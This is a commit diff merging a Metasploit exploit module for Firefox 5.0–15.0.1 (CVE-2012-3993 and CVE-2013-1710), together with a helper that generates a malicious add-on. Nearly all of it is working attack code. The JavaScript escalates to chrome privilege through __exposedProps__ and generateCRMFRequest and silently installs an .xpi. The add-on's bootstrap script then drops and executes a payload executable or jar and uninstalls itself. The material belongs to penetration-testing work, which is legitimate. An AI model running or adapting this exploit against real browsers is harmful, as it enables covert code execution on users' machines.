Land rapid7#2781 - Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution

Author: wchen-r7

lib/msf/core/exploit/mixins.rb

@@ -98,4 +98,7 @@
 # WebApp
 require 'msf/core/exploit/web'
 
+# Firefox addons
+require 'msf/core/exploit/remote/firefox_addon_generator'
+
 require 'msf/core/exploit/remote/browser_exploit_server'

lib/msf/core/exploit/remote/browser_exploit_server.rb

@@ -92,6 +92,15 @@ def get_module_resource
       "#{get_resource.chomp("/")}/#{@exploit_receiver_page}"
     end
 
+    #
+    # Returns the absolute URL to the module's resource that points to on_request_exploit
+    #
+    # @return [String] absolute URI to the exploit page
+    #
+    def get_module_uri
+      "#{get_uri.chomp("/")}/#{@exploit_receiver_page}"
+    end
+
     #
     # Returns the current target
     #
@@ -166,8 +175,10 @@ def get_bad_requirements(profile)
         # Special keys to ignore because the script registers this as [:activex] = true or false
         next if k == :clsid or k == :method
 
-        if v.class == Regexp
+        if v.is_a? Regexp
           bad_reqs << k if profile[k.to_sym] !~ v
+        elsif v.is_a? Proc
+          bad_reqs << k unless v.call(profile[k.to_sym])
         else
           bad_reqs << k if profile[k.to_sym] != v
         end

lib/msf/core/exploit/remote/firefox_addon_generator.rb

@@ -0,0 +1,174 @@
+# -*- coding: binary -*-
+
+###
+#
+# The FirefoxAddonGenerator allows a firefox exploit module to serve a malicious .xpi
+# addon that will gain a session.
+#
+###
+
+module Msf
+module Exploit::Remote::FirefoxAddonGenerator
+
+  # Add in the supported datastore options
+  def initialize( info = {} )
+    super(update_info(info,
+      'Platform'      => %w{ java linux osx solaris win },
+      'Payload'       => { 'BadChars' => '', 'DisableNops' => true },
+      'Targets'       =>
+        [
+          [ 'Generic (Java Payload)',
+            {
+              'Platform' => ['java'],
+              'Arch' => ARCH_JAVA
+            }
+          ],
+          [ 'Windows x86 (Native Payload)',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_X86,
+            }
+          ],
+          [ 'Linux x86 (Native Payload)',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X86,
+            }
+          ],
+          [ 'Mac OS X PPC (Native Payload)',
+            {
+              'Platform' => 'osx',
+              'Arch' => ARCH_PPC,
+            }
+          ],
+          [ 'Mac OS X x86 (Native Payload)',
+            {
+              'Platform' => 'osx',
+              'Arch' => ARCH_X86,
+            }
+          ]
+        ],
+      'DefaultTarget'  => 1
+    ))
+
+    register_options( [
+      OptString.new('ADDONNAME', [ true,
+        "The addon name.",
+        "HTML5 Rendering Enhancements"
+        ]),
+      OptBool.new('AutoUninstall', [ true,
+        "Automatically uninstall the addon after payload execution",
+        true
+        ])
+    ], self.class)
+  end
+
+  # @return [Rex::Zip::Archive] containing a .xpi, ready to be served with the
+  # 'application/x-xpinstall' MIME type
+  def generate_addon_xpi
+    if target.name == 'Generic (Java Payload)'
+      jar = p.encoded_jar
+      jar.build_manifest(:main_class => "metasploit.Payload")
+      payload_file = jar.pack
+      payload_name='payload.jar'
+      payload_script=%q|
+  var java = Components.classes["@mozilla.org/appshell/window-mediator;1"].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow('navigator:browser').Packages.java
+  java.lang.System.setSecurityManager(null);
+  var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]);
+  var m = cl.loadClass("metasploit.Payload").getMethod("main", [java.lang.Class.forName("[Ljava.lang.String;")]);
+  m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]);
+      |
+    else
+      payload_file = generate_payload_exe
+      payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe'
+      payload_script=%q|
+  var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
+  process.init(tmp);
+  process.run(false,[],0);
+      |
+      if target.name != 'Windows x86 (Native Payload)'
+        payload_script = %q|
+        var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
+        chmod.initWithPath("/bin/chmod");
+        var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
+        process.init(chmod);
+        process.run(true, ["+x", tmp.path], 2);
+        | + payload_script
+      end
+    end
+
+    zip = Rex::Zip::Archive.new
+    xpi_guid = Rex::Text.rand_guid
+    bootstrap_script = %q|
+function startup(data, reason) {
+  var file = Components.classes["@mozilla.org/file/directory_service;1"].
+          getService(Components.interfaces.nsIProperties).
+          get("ProfD", Components.interfaces.nsIFile);
+  file.append("extensions");
+    |
+    bootstrap_script << %Q|xpi_guid="#{xpi_guid}";|
+    bootstrap_script << %Q|payload_name="#{payload_name}";|
+    bootstrap_script << %q|
+  file.append(xpi_guid);
+  file.append(payload_name);
+  var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
+          getService(Components.interfaces.nsIProperties).
+          get("TmpD", Components.interfaces.nsIFile);
+  tmp.append(payload_name);
+  tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
+  file.copyTo(tmp.parent, tmp.leafName);
+    |
+    bootstrap_script << payload_script
+
+    if (datastore['AutoUninstall'])
+      bootstrap_script <<  %q|
+  try { // Fx < 4.0
+    Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
+  } catch (e) {}
+  try { // Fx 4.0 and later
+    Components.utils.import("resource://gre/modules/AddonManager.jsm");
+    AddonManager.getAddonByID(xpi_guid, function(addon) {
+      addon.uninstall();
+    });
+  } catch (e) {}
+      |
+    end
+
+    bootstrap_script << "}"
+
+    zip.add_file('bootstrap.js', bootstrap_script)
+    zip.add_file(payload_name, payload_file)
+    zip.add_file('chrome.manifest', "content\t#{xpi_guid}\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://#{xpi_guid}/content/overlay.xul\n")
+    zip.add_file('install.rdf', %Q|<?xml version="1.0"?>
+<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
+  <Description about="urn:mozilla:install-manifest">
+    <em:id>#{xpi_guid}</em:id>
+    <em:name>#{datastore['ADDONNAME']}</em:name>
+    <em:version>1.0</em:version>
+    <em:bootstrap>true</em:bootstrap>
+    <em:unpack>true</em:unpack>
+    <em:targetApplication>
+      <Description>
+        <em:id>[email protected]</em:id>
+        <em:minVersion>1.0</em:minVersion>
+        <em:maxVersion>*</em:maxVersion>
+      </Description>
+    </em:targetApplication>
+    <em:targetApplication>
+      <Description>
+        <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
+        <em:minVersion>1.0</em:minVersion>
+        <em:maxVersion>*</em:maxVersion>
+      </Description>
+    </em:targetApplication>
+    </Description>
+</RDF>|)
+    zip.add_file('overlay.xul', %q|<?xml version="1.0"?>
+<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
+  <script src="bootstrap.js"/>
+  <script><![CDATA[window.addEventListener("load", function(e) { startup(); }, false);]]></script>
+</overlay>|)
+    zip
+  end
+end
+end

modules/exploits/multi/browser/firefox_proto_crmfrequest.rb

@@ -0,0 +1,116 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::FirefoxAddonGenerator
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution',
+      'Description'    => %q{
+        On versions of Firefox from 5.0 to 15.0.1, the InstallTrigger global, when given
+        invalid input, would throw an exception that did not have an __exposedProps__
+        property set. By re-setting this property on the exception object's prototype,
+        the chrome-based defineProperty method is made available.
+
+        With the defineProperty method, functions belonging to window and document can be
+        overriden with a function that gets called from chrome-privileged context. From here,
+        another vulnerability in the crypto.generateCRMFRequest function is used to "peek"
+        into the context's private scope. Since the window does not have a chrome:// URL,
+        the insecure parts of Components.classes are not available, so instead the AddonManager
+        API is invoked to silently install a malicious plugin.
+      },
+      'License' => MSF_LICENSE,
+      'Author'  => [
+        'Mariusz Mlynski', # discovered CVE-2012-3993
+        'moz_bug_r_a4', # discovered CVE-2013-1710
+        'joev' # metasploit module
+      ],
+      'DisclosureDate' => "Aug 6 2013",
+      'References' => [
+        ['CVE', '2012-3993'],  # used to install function that gets called from chrome:// (ff<15)
+        ['OSVDB', '86111'],
+        ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=768101'],
+        ['CVE', '2013-1710'],  # used to peek into privileged caller's closure (ff<23)
+        ['OSVDB', '96019']
+      ],
+      'BrowserRequirements' => {
+        :source  => 'script',
+        :ua_name => HttpClients::FF,
+        :ua_ver  => lambda { |ver| ver.to_i.between?(5, 15) }
+      }
+    ))
+
+    register_options([
+      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] )
+    ], self.class)
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    if request.uri.match(/\.xpi$/i)
+      print_status("Sending the malicious addon")
+      send_response(cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
+    else
+      print_status("Sending HTML")
+      send_response_html(cli, generate_html(target_info))
+    end
+  end
+
+  def generate_html(target_info)
+    injection = if target_info[:ua_ver].to_i == 15
+      "Function.prototype.call.call(p.__defineGetter__,obj,key,runme);"
+    else
+      "p2.constructor.defineProperty(obj,key,{get:runme});"
+    end
+
+    %Q|
+      <html>
+      <body>
+      #{datastore['CONTENT']}
+      <div id='payload' style='display:none'>
+      if (!window.done){
+        window.AddonManager.getInstallForURL(
+          '#{get_module_uri}/addon.xpi',
+          function(install) { install.install() },
+          'application/x-xpinstall'
+        );
+        window.done = true;
+      }
+      </div>
+      <script>
+      try{InstallTrigger.install(0)}catch(e){p=e;};
+      var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
+      p2.__exposedProps__={
+        constructor:'rw',
+        prototype:'rw',
+        defineProperty:'rw',
+        __exposedProps__:'rw'
+      };
+      var s = document.querySelector('#payload').innerHTML;
+      var q = false;
+      var register = function(obj,key) {
+        var runme = function(){
+          if (q) return;
+          q = true;
+          window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 384, null, "rsa-ex");
+        };
+        try {
+          #{injection}
+        } catch (e) {}
+      };
+      for (var i in window) register(window, i);
+      for (var i in document) register(document, i);
+      </script>
+      </body>
+      </html>
+    |
+  end
+end